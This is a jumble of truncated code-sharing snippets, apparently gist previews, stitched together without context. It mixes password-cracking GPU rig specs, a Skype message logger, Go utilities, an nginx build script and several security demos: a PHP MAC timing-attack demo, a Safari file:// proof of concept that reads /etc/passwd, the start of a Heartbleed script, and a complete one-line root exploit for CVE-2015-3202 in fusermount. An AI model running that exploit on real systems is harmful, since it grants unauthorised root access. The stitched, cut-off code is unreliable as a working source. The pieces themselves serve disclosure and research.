Product: Sagitta Brutalis Titan X (PN S3480-GTX-TITANX)
Software: cudaHashcat 1.36, ForceWare 346.59
Accelerator: 8x Nvidia GTX Titan X reference design
import Skype4Py | |
def Commands(message, status): | |
if status == 'SENT' or (status == 'RECEIVED'): | |
print message.Body | |
skype = Skype4Py.Skype() | |
skype.OnMessageStatus = Commands | |
skype.Attach() | |
while True: |
package main | |
import ( | |
"encoding/json" | |
"fmt" | |
"io/ioutil" | |
"log" | |
"net/http" | |
"net/url" | |
"os" |
import ( | |
"archive/zip" | |
"io" | |
"os" | |
"path/filepath" | |
"strings" | |
) | |
func zipit(source, target string) error { | |
zipfile, err := os.Create(target) |
<?php | |
/* | |
* This code is copied from | |
* http://www.warpconduit.net/2013/04/14/highly-secure-data-encryption-decryption-made-easy-with-php-mcrypt-rijndael-256-and-cbc/ | |
* to demonstrate an attack against it. Specifically, we simulate a timing leak | |
* in the MAC comparison which, in a Mac-then-Encrypt (MtA) design, we show | |
* breaks confidentiality. | |
* | |
* Slight modifications such as making it not serialize/unserialize and removing |
Product: Sagitta Brutalis Titan X (PN S3480-GTX-TITANX)
Software: cudaHashcat 1.36, ForceWare 346.59
Accelerator: 8x Nvidia GTX Titan X reference design
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. | |
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 | |
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 | |
# Here's how it works, $a holds the name of a shellscript to be executed as | |
# root. | |
a=/tmp/.$$; | |
# $b is used twice, first to build the contents of shellscript $a, and then as |
Product: Sagitta Brutalis 980 (PN S2480-GTX-980)
Software: cudaHashcat 1.36b25, ForceWare 346.35
Accelerator: 8x Nvidia GTX 980 reference design, +250 clock offset
It appears that Safari does not enforce any kind of access | |
restrictions for XMLHTTPRequests on FILE: scheme URLs. As a | |
result, any HTML file on the local file system that is opened in | |
Safari can read any file that the user has access to (and, of | |
course, it can upload those files too). Here's a little | |
proof-of-concept. Copy and paste this into a local HTML file and | |
open it in Safari. It will display the contents of /etc/passwd. | |
<script src=https://code.jquery.com/jquery-2.1.3.min.js></script> | |
<script> |
#!/usr/bin/env bash | |
# names of latest versions of each package | |
export VERSION_PCRE=pcre-8.38 | |
export VERSION_OPENSSL=openssl-1.0.2d | |
export VERSION_NGINX=nginx-1.9.7 | |
# URLs to the source directories | |
export SOURCE_OPENSSL=https://www.openssl.org/source/ | |
export SOURCE_PCRE=ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/ |
#!/usr/bin/python | |
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
# The author disclaims copyright to this source code. | |
import sys | |
import struct | |
import socket | |
import time | |
import select |